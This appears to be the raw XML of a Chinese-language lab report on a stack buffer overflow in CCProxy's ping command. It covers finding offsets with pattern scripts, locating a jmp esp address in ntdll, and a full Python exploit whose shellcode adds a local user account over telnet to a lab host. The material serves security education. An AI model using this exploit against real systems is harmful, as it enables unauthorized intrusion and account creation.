    <w:p w14:paraId="7B7F4E7A" w14:textId="77777777" w:rsidR="00A27AA3" w:rsidRDefault="00A27AA3" w:rsidP="00A27AA3">
      <w:r>
        <w:t>C: \Perl\bin&gt; perl.exe patternOffset.pl 68423768 2000得到结果1012</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF29CF3" w14:textId="431D8432" w:rsidR="00A27AA3" w:rsidRDefault="009A7D85" w:rsidP="00A27AA3">
      <w:r w:rsidRPr="009A7D85">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C1789AD" wp14:editId="2E09A577">
            <wp:extent cx="4791744" cy="1124107"/>
            <wp:effectExtent l="0" t="0" r="8890" b="0"/>
            <wp:docPr id="13305403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54034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112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C0241" w14:textId="21CF0AA8" w:rsidR="00415185" w:rsidRDefault="00415185" w:rsidP="00A27AA3">
      <w:r w:rsidRPr="00415185">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这说明，</w:t>
      </w:r>
      <w:r w:rsidRPr="00415185">
        <w:t>RET相对缓冲区起始地址的偏移大小是1012字节。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0421AAB5" w14:textId="74B54FEF" w:rsidR="005971E8" w:rsidRDefault="005971E8" w:rsidP="00A27AA3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F7BEF38" w14:textId="77777777" w:rsidR="00A27AA3" w:rsidRDefault="00A27AA3" w:rsidP="00A27AA3">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dbg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>命令提示符挂起</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CCProxy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>进程后查询</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>esp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>命令地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37BF6294" w14:textId="65F3ECDE" w:rsidR="002565CF" w:rsidRDefault="002565CF" w:rsidP="002565CF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使用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>lm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令查询加载模块地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B577A18" w14:textId="23276BBB" w:rsidR="002565CF" w:rsidRDefault="002565CF" w:rsidP="002565CF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查询</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ntdll</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模块中的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>jmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>esp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="12A24885" w14:textId="64D410F0" w:rsidR="002565CF" w:rsidRDefault="002565CF" w:rsidP="002565CF">
      <w:pPr>
        <w:pStyle w:val="a5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使用u</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令查看是否是</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>jmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>esp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="10950220" w14:textId="16BA77CD" w:rsidR="00A27AA3" w:rsidRDefault="002565CF" w:rsidP="00A27AA3">
      <w:r w:rsidRPr="002565CF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0EF9DB07" wp14:editId="4F0BE76F">
            <wp:extent cx="5274310" cy="1936115"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:docPr id="10184761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47614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F43BE" w14:textId="77777777" w:rsidR="00A27AA3" w:rsidRDefault="00A27AA3" w:rsidP="00A27AA3">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用指向</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>esp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>命令的地址覆盖返回地址，再把shellcode放置在程序执行JMP ESP指令时ESP指向的地址处，即完成攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105699C2" w14:textId="77777777" w:rsidR="00A27AA3" w:rsidRDefault="00A27AA3" w:rsidP="00A27AA3"/>
    <w:p w14:paraId="4376A860" w14:textId="5C2BA6A2" w:rsidR="00A6662E" w:rsidRPr="00A6662E" w:rsidRDefault="00A6662E" w:rsidP="00A6662E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用和</w:t>
      </w:r>
      <w:r>
        <w:t>RET偏移量同样的方法获取ESP偏移量：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7A22E4" w14:textId="5B797442" w:rsidR="00A6662E" w:rsidRDefault="00A6662E" w:rsidP="00A6662E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr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用</w:t>
      </w:r>
      <w:r>
        <w:t>CDB挂起CCProxy.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9D831A" w14:textId="235D42DB" w:rsidR="00A6662E" w:rsidRDefault="00A6662E" w:rsidP="00A6662E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr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利用</w:t>
      </w:r>
      <w:r>
        <w:t>patternCreate.pl生成长为2000的字符串</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C4CD62" w14:textId="24799648" w:rsidR="00A6662E" w:rsidRDefault="00A6662E" w:rsidP="00A6662E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用</w:t>
      </w:r>
      <w:r>
        <w:t>ping命令向目标主机发送这个字符串</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34080058" w14:textId="41677C67" w:rsidR="00A6662E" w:rsidRDefault="00A6662E" w:rsidP="00A6662E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>CDB捕捉到CCProxy.exe的崩溃事件时，查看ESP的内容为0x61413161</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042FFE2F" w14:textId="129258FB" w:rsidR="0014707E" w:rsidRDefault="0014707E" w:rsidP="00A6662E">
      <w:r w:rsidRPr="0014707E">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="136C53DD" wp14:editId="2D86D546">
            <wp:extent cx="5274310" cy="2289810"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="44367027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67027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7CA22" w14:textId="4FD07245" w:rsidR="00A6662E" w:rsidRDefault="00A6662E" w:rsidP="00A6662E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用</w:t>
      </w:r>
      <w:r>
        <w:t>patternOffset.pl计算出它在整个长为2000的字符串中的偏移</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E2359F" w14:textId="77777777" w:rsidR="00A6662E" w:rsidRDefault="00A6662E" w:rsidP="00A6662E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>命令行输入perl.exe patternOffset.pl 61413161 2000,运行脚本：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52945BEF" w14:textId="288196A7" w:rsidR="00A6662E" w:rsidRDefault="00041682" w:rsidP="00A6662E">
      <w:r w:rsidRPr="00041682">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="54F491EF" wp14:editId="458F60CE">
            <wp:extent cx="4372585" cy="943107"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="14927429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74295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72585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B3DC9" w14:textId="3263CB40" w:rsidR="00A6662E" w:rsidRDefault="00A6662E" w:rsidP="00A6662E">
      <w:r w:rsidRPr="00A6662E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>说明</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6662E">
        <w:t>ESP指向字符串的第4个字节</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758ABE50" w14:textId="10E8EEDB" w:rsidR="00A6662E" w:rsidRDefault="00A6662E" w:rsidP="00401A4F">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>shellcode</w:t>
      </w:r>
      <w:r w:rsidR="00401A4F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>构造</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F483A13" w14:textId="67D3A56D" w:rsidR="00401A4F" w:rsidRDefault="00401A4F" w:rsidP="00401A4F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击流程：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581DCDBF" w14:textId="4CB8124A" w:rsidR="00401A4F" w:rsidRDefault="00401A4F" w:rsidP="00401A4F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:t>Socket编程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4725A6D9" w14:textId="285FD200" w:rsidR="00401A4F" w:rsidRDefault="00401A4F" w:rsidP="00401A4F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr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连接目标主机（</w:t>
      </w:r>
      <w:r>
        <w:t>connect）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA71225" w14:textId="59B8603D" w:rsidR="00401A4F" w:rsidRDefault="00401A4F" w:rsidP="00401A4F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>构造溢出字符串（即构造后接</w:t>
      </w:r>
      <w:r>
        <w:t>shellcode的ping命令：ping shellcode\r\n）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B76049" w14:textId="5556DF73" w:rsidR="00401A4F" w:rsidRDefault="00401A4F" w:rsidP="00401A4F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>向目标主机发送溢出字符串（</w:t>
      </w:r>
      <w:r>
        <w:t>send）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1F29CF" w14:textId="3BA5EA93" w:rsidR="00401A4F" w:rsidRPr="00401A4F" w:rsidRDefault="00401A4F" w:rsidP="00401A4F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关闭连接</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6105AE05" w14:textId="020C9D96" w:rsidR="00401A4F" w:rsidRDefault="00315527" w:rsidP="00401A4F">
      <w:r w:rsidRPr="00315527">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="390626B6" wp14:editId="699F6487">
            <wp:extent cx="5274310" cy="2037080"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
            <wp:docPr id="167082856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82856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AAA00" w14:textId="7604DD36" w:rsidR="00401A4F" w:rsidRDefault="00401A4F" w:rsidP="00401A4F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>python攻击代码：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E073C23" w14:textId="77777777" w:rsidR="00315527" w:rsidRDefault="00315527" w:rsidP="00315527">
      <w:r>
        <w:t>import socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469AC276" w14:textId="77777777" w:rsidR="00315527" w:rsidRDefault="00315527" w:rsidP="00315527">
      <w:r>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>os</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3A23081A" w14:textId="77777777" w:rsidR="00315527" w:rsidRDefault="00315527" w:rsidP="00315527">
      <w:r>
        <w:t xml:space="preserve">sock = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>socket.socket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>socket.AF_INET,socket.SOCK_STREAM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFAA21D" w14:textId="77777777" w:rsidR="00315527" w:rsidRDefault="00315527" w:rsidP="00315527">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>sock.connect</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(('192.168.182.135',23))  #telnet用的是23端口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662A161D" w14:textId="77777777" w:rsidR="00315527" w:rsidRDefault="00315527" w:rsidP="00315527">
      <w:r>
        <w:t xml:space="preserve">s = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sock.recv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(2023)   # 设置接受对方发送的数据字节数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779F3FCE" w14:textId="77777777" w:rsidR="00315527" w:rsidRDefault="00315527" w:rsidP="00315527">
      <w:r>
        <w:t># 构造shellcode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335FC9E8" w14:textId="77777777" w:rsidR="00315527" w:rsidRDefault="00315527" w:rsidP="00315527">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sendStr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>b'ping</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ' + b'\x90'*4  # 该漏洞的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>esp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>就是指向第四个字节</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD19DB9" w14:textId="77777777" w:rsidR="00315527" w:rsidRDefault="00315527" w:rsidP="00315527">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>= b'\xE9\x03\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xFC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xFF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xFF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\x90\x90\x90'       #从0x012E6700跳到0x012E6308</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109CB740" w14:textId="77777777" w:rsidR="00315527" w:rsidRDefault="00315527" w:rsidP="00315527">
      <w:r>
        <w:t># shellcode作用是在本地增加一个a帐户</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672EBB3C" w14:textId="77777777" w:rsidR="00315527" w:rsidRDefault="00315527" w:rsidP="00315527">
      <w:r>
        <w:t xml:space="preserve">shellcode = b'\x55\x8B\xEC\x33\xFF\x57\x83\xEC\x0C\xC6\x45\xF0\x6E\xC6\x45\xF1\x65\xC6\x45\xF2\x74\xC6\x45\xF3\x20\xC6\x45\xF4\x75\xC6\x45\xF5\x73\xC6\x45\xF6\x65\xC6\x45\xF7\x72\xC6\x45\xF8\x20\xC6\x45\xF9\x61\xC6\x45\xFA\x20\xC6\x45\xFB\x2F\xC6\x45\xFC\x61\xC6\x45\xFD\x64\xC6\x45\xFE\x64\x8D\x45\xF0\x50\xB8\xC7\x93\xBF\x77\xFF\xD0' </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D1D45A" w14:textId="77777777" w:rsidR="00315527" w:rsidRDefault="00315527" w:rsidP="00315527">
      <w:r>
        <w:t># 为了覆盖返回地址的填充</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACC3538" w14:textId="77777777" w:rsidR="00315527" w:rsidRDefault="00315527" w:rsidP="00315527">
      <w:r>
        <w:t xml:space="preserve">padding = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>b'a</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">'*920                </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47228BD8" w14:textId="77777777" w:rsidR="00315527" w:rsidRDefault="00315527" w:rsidP="00315527">
      <w:r>
        <w:t>#jmpesp = b'\x12\x45\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xfa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\x7f'     # 指向</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>esp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>指令的地址0x7ffa4512覆盖ret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135BC9E5" w14:textId="77777777" w:rsidR="00315527" w:rsidRDefault="00315527" w:rsidP="00315527">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jmpesp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = b'\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\x1e\x96\x7c'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435D034C" w14:textId="77777777" w:rsidR="00315527" w:rsidRDefault="00315527" w:rsidP="00315527">
      <w:r>
        <w:t># 末尾至少填充16个字符</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625461C9" w14:textId="77777777" w:rsidR="00315527" w:rsidRDefault="00315527" w:rsidP="00315527">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sendStr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sendStr+jmp+shellcode+padding+jmpesp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> +</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>b'a</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>'*16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A383A6E" w14:textId="77777777" w:rsidR="00315527" w:rsidRDefault="00315527" w:rsidP="00315527">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sock.send</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sendStr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)                         #发送shellcode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2662B5" w14:textId="77777777" w:rsidR="00315527" w:rsidRDefault="00315527" w:rsidP="00315527">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sock.send</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(b'\n')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA9FC5E" w14:textId="6DA57DF0" w:rsidR="00A27AA3" w:rsidRDefault="00315527" w:rsidP="00315527">
      <w:r>
        <w:t xml:space="preserve">s = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sock.recv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(2023)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C919D47" w14:textId="77777777" w:rsidR="00A27AA3" w:rsidRDefault="00A27AA3" w:rsidP="00621CFE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4606CEEC" w14:textId="77777777" w:rsidR="00621CFE" w:rsidRDefault="00621CFE" w:rsidP="00621CFE"/>
    <w:p w14:paraId="0E568557" w14:textId="745E0947" w:rsidR="008E4F52" w:rsidRPr="008E4F52" w:rsidRDefault="008E4F52" w:rsidP="00621CFE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="008E4F52" w:rsidRPr="008E4F5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A1C34A2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BC62A2F4"/>
    <w:lvl w:ilvl="0" w:tplc="1A906E6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5E941382"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B3AA2D70"/>
    <w:lvl w:ilvl="0" w:tplc="EF08CE6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61FD79F3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="76866602"/>
    <w:lvl w:ilvl="0" w:tplc="76BC6C8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474300671">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1975939973">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="153557526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432E"/>
    <w:rsid w:val="00041682"/>
    <w:rsid w:val="0014707E"/>
    <w:rsid w:val="00171E0E"/>
    <w:rsid w:val="002030E6"/>
    <w:rsid w:val="002565CF"/>
    <w:rsid w:val="00275601"/>
    <w:rsid w:val="00315527"/>
    <w:rsid w:val="00401A4F"/>
    <w:rsid w:val="00415185"/>
    <w:rsid w:val="005971E8"/>
    <w:rsid w:val="005D0131"/>
    <w:rsid w:val="00621CFE"/>
    <w:rsid w:val="006556A2"/>
    <w:rsid w:val="007E091C"/>
    <w:rsid w:val="00833502"/>
    <w:rsid w:val="00864CB2"/>
    <w:rsid w:val="008C0FD5"/>
    <w:rsid w:val="008C432E"/>
    <w:rsid w:val="008E4F52"/>
    <w:rsid w:val="009439BE"/>
    <w:rsid w:val="009A7D85"/>
    <w:rsid w:val="009D1FC2"/>
    <w:rsid w:val="00A27AA3"/>
    <w:rsid w:val="00A6662E"/>
    <w:rsid w:val="00A924C3"/>
    <w:rsid w:val="00AA10CA"/>
    <w:rsid w:val="00BD41C1"/>
    <w:rsid w:val="00CC7D47"/>
    <w:rsid w:val="00D445A8"/>
    <w:rsid w:val="00DB57DE"/>
    <w:rsid w:val="00E10B59"/>
    <w:rsid w:val="00FC6E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F18759"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{E45B3AAB-298E-4A3E-BF82-AA540C3064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2030E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2030E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E10B5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D445A8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2030E6"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a4">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="002030E6"/>
    <w:rPr>
      <w:color w:val="954F72" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="10">
    <w:name w:val="标题 1 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="002030E6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2030E6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E10B59"/>
    <w:pPr>
      <w:ind w:firstLineChars="200" w:firstLine="420"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="30">
    <w:name w:val="标题 3 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="3"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00E10B59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D445A8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3022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173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2025</TotalTime>
  <Pages>6</Pages>
  <Words>471</Words>
  <Characters>2688</Characters>
